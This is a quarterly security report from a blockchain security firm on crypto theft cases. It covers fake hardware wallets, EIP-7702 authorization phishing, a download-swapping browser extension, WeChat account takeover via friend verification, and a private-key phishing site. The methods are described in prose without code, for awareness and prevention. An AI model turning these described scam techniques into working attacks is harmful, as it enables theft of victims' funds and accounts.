Since SlowMist launched the MistTrack stolen form submission feature, we receive a large number of victim requests for help daily, hoping for assistance in tracking and recovering funds, including not a few victims who lost tens of millions of dollars. Based on this, this series aims to analyze common and rare malicious methods through the statistics and analysis of stolen requests received each quarter, helping industry participants better understand and prevent security risks and protect their assets.
According to statistics, the MistTrack Team received a total of 429 theft forms in Q2 of 2025, including 278 domestic forms and 151 overseas forms. We provided free evaluation community services for these forms. (Ps. This data only covers cases submitted via forms and does not include cases contacted through email or other channels.)
The MistTrack Team assisted 11 stolen clients in freezing/recovering about $11.95 million in funds in Q2.
Reasons for Theft
In Q2 of 2025, phishing became the top reason for theft. Next, we will highlight several typical cases to help everyone better avoid pitfalls, prevent theft, and protect their assets.
1. Fake Hardware Wallet
This quarter, we encountered multiple theft incidents related to hardware wallets, and the victims almost all felt they had taken adequate security measures, but there were fatal vulnerabilities in actual operations.
For instance, a victim contacted the SlowMist security team, stating that he had purchased a tampered cold wallet on Douyin, resulting in approximately $6.5 million in crypto assets being stolen.
(https://x.com/im23pds/status/1933763989215064545)
A similar case involved a user purchasing a hardware wallet from an e-commerce platform, with complete packaging and instructions. The attacker activated the device in advance, obtained the mnemonic phrase, then repackaged the hardware wallet with a forged manual and sold it through unofficial channels. Once the user scanned the code to activate it and transferred assets to the wallet address, the funds were immediately transferred away, following the standard process for stealing from fake wallets.
Some people also received a cold wallet as a 'winning gift.' Attackers disguised themselves as well-known manufacturers on social platforms, sending cold wallet devices for free under the guise of 'lottery' or 'airdrop.' The 'brand new sealed' real device looked intact, and users followed the 'user manual' to input their mnemonic phrases, never considering that this was a pre-set phishing device.
(https://x.com/DeFi_Hanzo/status/1936188462752735587)
Some attackers even used personal information leaked from previous data breaches to forge an 'official notification letter,' along with an 'upgraded hardware wallet,' claiming that 'the original device has security risks' and requesting users to migrate their mnemonic phrases to the new 'secure device.' These devices often contain malicious firmware or induce users to input their mnemonic phrases into forged software. Once migrated, the funds are immediately transferred away by the attackers.
(https://x.com/intell_on_chain/status/1924053862203212144)
We summarize that the problem does not actually lie with the 'cold wallet' itself, but rather in the general lack of user awareness regarding the authenticity of hardware wallets, secure initialization processes, and attack methods. Many users fall victim to the illusion of 'looking safe,' believing that using a cold wallet guarantees their safety, but in reality, this is just another form of 'social engineering.'
2. EIP-7702 Phishing
In Q2, a new type of phishing using EIP-7702 emerged. A user was targeted by the Inferno Drainer gang while attempting to authorize EIP-7702, resulting in a loss of over $140,000.
(https://etherscan.io/tx/0x1ddc8cecbcaad5396fdf59ff8cddd8edd15f82f1e26779e581b7a4785a5f5e06/advanced)
The attacker's methods are not complicated but somewhat 'creative.' In this case, they did not switch the user's EOA address to the 7702 contract address through phishing; instead, the delegated address was not a phishing address but the already existing MetaMask: EIP-7702 Delegator (0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B) from a few days ago. The phishing used the mechanism within MetaMask: EIP-7702 Delegator to complete the batch authorization phishing theft operation related to the victim's address.
The high efficiency of this type of phishing attack fundamentally lies in the delegated mechanism change brought by EIP-7702 — a user's EOA address can be authorized to a certain contract, granting it the characteristics of that contract (such as batch transfers, batch authorizations, gas payment, etc.). If a user authorizes their address to a malicious contract, there is a risk; if a user authorizes their address to a legitimate contract but it is maliciously exploited by a phishing site, there is also a risk.
EIP-7702 indeed brings new possibilities for wallet experiences, but new capabilities also come with new risk boundaries. Before signing, try to ensure what you see is what you sign, and think carefully about 'who is being authorized and what they can do.' For more on risk prevention related to EIP-7702, please refer to our previous publication (In-depth Discussion on EIP-7702 and Best Practices).
3. Malicious Browser Extensions
In Q2, we also encountered a very covert attack method — browser extensions disguised as security plugins. Users reported a Chrome extension called 'Osiris' to us, and after in-depth analysis, we confirmed that this extension claimed to detect phishing links and suspicious websites but had obvious phishing characteristics.
Attackers typically recommend it to target users through social platforms in a 'scientific popularization' manner, tricking them into installing it voluntarily. Once the user installs the extension, it uses a certain interface of the browser to load web request interception rules from the attacker's remote server. We found that these rules specifically intercept all types of download requests such as .exe, .dmg, .zip, etc., and then secretly replace the original file the user intended to download with malicious programs.
More covertly, attackers also guide users to visit some official websites that people use daily, such as Notion, Zoom, etc. When users attempt to download installation packages from the official website, what they actually download is a substituted malicious program, but the browser's download source still shows 'official website,' making it hard to detect abnormalities.
These malicious codes can package critical data from the user's computer, including local data from the Chrome browser, Keychain, and other sensitive information, and upload it to the server controlled by the attacker. The attacker can then attempt to extract the victim's mnemonic phrases, private keys, or login credentials from this data, further stealing the user's crypto assets or even taking over their exchange accounts, social media accounts, etc.
We advise users not to casually install browser plugins or applications recommended by strangers, even if they look 'official.' Additionally, regularly clean up infrequently used or unknown source plugins in the browser, and try to use well-known plugin management tools or antivirus software to enhance detection.
4. WeChat Account Theft
In Q2, we received many user feedbacks that their WeChat accounts appeared to be stolen. After attackers took control of the account, they impersonated the victim to scam friends by offering low-priced USDT, causing victims' friends to be deceived. More seriously, some attackers would also change the WeChat password, completely taking over the account, with the transfer of control happening quietly. Unlike traditional on-chain security risks, these incidents exploit the trust mechanism of acquaintances on social platforms.
(https://x.com/EnHeng456/status/1935155663635956085)
Currently, we cannot fully confirm how the attacker managed to steal the WeChat account, but through testing and observation, this type of account theft may follow a certain operational path:
The attacker has already obtained your WeChat account and password — possibly due to your registered email, phone number, or password being leaked on another platform, or using a weak password, or being subject to credential stuffing.
When logging into WeChat, if the system detects a 'uncommon device,' it will trigger a secondary verification, one method being: asking a 'frequently contacted friend' to help verify.
Our actual testing found that the definition of 'frequently contacted friends' is very loose; even if they just added you as a friend and occasionally said a few words in the group, the system might still recognize it as 'frequently contacted.'
If the attacker had previously added you as a friend and quietly lurked, once they obtained your account password, they could initiate a login request late at night or when you are not online, asking 'accomplice friends' to cooperate with verification codes, making the account theft likely successful.
The above path is just a speculation of possibilities; specific reasons need further investigation and analysis. But it at least indicates that the security boundary for Web3 users has expanded to the off-chain social layer.
5. Social Engineering Attacks
In Q2, we received a request for help from a user. He stated that his wallet indicated a 'risky authorization' and could not be revoked, with multiple clicks yielding no response. Initially, he thought it was related to some token swap authorization he had done before, so he contacted SlowMist, hoping for an investigation.
We checked through the block explorer and common revoke tools but did not find the authorization records he mentioned. Soon after, he sent another screenshot, but we noticed that the address in this screenshot was not the same as the one he initially sent. We then suggested he send the URL of the query tool to cross-verify related information.
We opened a website called Signature Checker (signature[.]land) and immediately felt something was off. The webpage is designed very similarly to the well-known authorization management tool Revoke Cash, even the logo is quite similar. But upon closer inspection, it actually allows users to input their private keys to 'check risky signatures' — this is already a very clear phishing behavior. Next, we tested with different addresses and found that no matter which address was input, this website would 'detect' risky authorizations, and the authorization times were very close to the query times, giving a false sense of urgency that 'it's still time to revoke now.' We also tried inputting a random test private key, and although the page prompted 'format error,' the network request was still sent out. After analyzing the front-end code, we confirmed that this phishing website would send the user's input information (including address and private key) to the attacker's email via EmailJS. It even called the Etherscan API to verify the existence of the address, further enhancing its credibility.
And the beginning of all this was merely an attacker saying to the victim in the comment section or private messages of a social platform: 'You have signed a phishing signature, please revoke the authorization as soon as possible.' Then they posted a link to this forged tool. What’s more frightening is that when the user begins to doubt the other party's identity, the other party can even transform and impersonate a SlowMist employee, attempting a secondary social engineering attack. This is no longer simple phishing; it's a series of traps.
The tactics of these social engineering attacks are not complicated, and they don't even involve advanced technology. However, they are very good at creating a sense of urgency and trust. They know that most users will instinctively panic when faced with vague but terrifying prompts like 'authorization risk' and will be eager to resolve the issue. Once this emotion is manipulated, it becomes very easy to gradually comply with many things that shouldn't be clicked or filled in.
Final Note
Looking back at Q2, we see a very clear trend: the attackers' means do not seem to have become more sophisticated, but they are increasingly understanding 'human nature'; their methods are gradually extending from on-chain to off-chain, with browser extensions, social accounts, verification processes, and user habits becoming attack entry points. Ultimately, regardless of how technology evolves, two principles always apply:
Always maintain skepticism and continuous verification;
Be cautious with authorization signature operations; each signature could be an 'opening action,' and you need to confirm who is outside the door.
Additionally, we recommend everyone read the (Blockchain Dark Forest Self-Rescue Manual) (https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md) repeatedly. This manual discusses not only survival skills but also the basic awareness needed to avoid becoming prey in the 'dark forest.'
If your cryptocurrency is unfortunately stolen, we will provide free community assistance services for case evaluation. You only need to submit a form according to the classification guide (funds stolen / encountered fraud / encountered extortion). Meanwhile, the hacker addresses you submit will also be synchronized to the SlowMist InMist Lab threat intelligence cooperation network for risk control. (Note: Chinese form submissions can be made at https://aml.slowmist.com/cn/recovery-funds.html, English form submissions at https://aml.slowmist.com/recovery-funds.html)
SlowMist has been deeply engaged in the field of anti-money laundering in cryptocurrency for many years, forming a complete and efficient solution covering compliance, investigation, and auditing, actively helping to build a healthy ecological environment for cryptocurrency, and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Among them, MistTrack is a compliance investigation platform that provides wallet address analysis, fund monitoring, and tracing, currently accumulating over 300 million address tags, more than 1,000 address entities, over 500,000 threat intelligence data, and over 90 million risk addresses, all of which provide strong protection to ensure the security of digital assets and combat money laundering crimes.